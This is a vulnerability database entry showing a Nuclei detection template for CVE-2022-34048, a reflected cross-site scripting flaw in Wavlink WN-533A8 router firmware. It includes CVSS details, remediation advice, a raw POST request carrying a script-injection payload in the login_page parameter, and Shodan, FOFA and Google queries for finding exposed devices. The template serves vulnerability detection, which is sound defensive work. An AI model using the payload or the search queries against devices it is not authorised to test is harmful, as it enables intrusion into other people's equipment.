Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-34048
HistoryAug 05, 2022 - 7:18 p.m.

Wavlink WN-533A8 - Cross-Site Scripting

2022-08-0519:18:35
ProjectDiscovery
github.com
1

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.9%

Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.
id: CVE-2022-34048

info:
  name: Wavlink WN-533A8 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50989
    - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing
    - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing
    - https://nvd.nist.gov/vuln/detail/CVE-2022-34048
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-34048
    cwe-id: CWE-79
    epss-score: 0.00107
    epss-percentile: 0.43187
    cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wn533a8_firmware
    shodan-query:
      - http.html:"Wavlink"
      - http.html:"wavlink"
      - http.title:"wi-fi app login"
    fofa-query:
      - title="wi-fi app login"
      - body="wavlink"
    google-query: intitle:"wi-fi app login"
  tags: cve2022,cve,wavlink,xss,router,edb

http:
  - raw:
      - |
        POST /cgi-bin/login.cgi HTTP/1.1
        Host: {{Hostname}}

        newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'x");alert(9);x=("?login=0");</script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008901007ca537c9ed20ec358848ea367341e8517856a5efdcc97c2ddc541726e2022100dc3dc1cfcc7b8c59ae34c49538b7843a602fca2a91fa144d30eb60a357ab354e:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.9%

Related for NUCLEI:CVE-2022-34048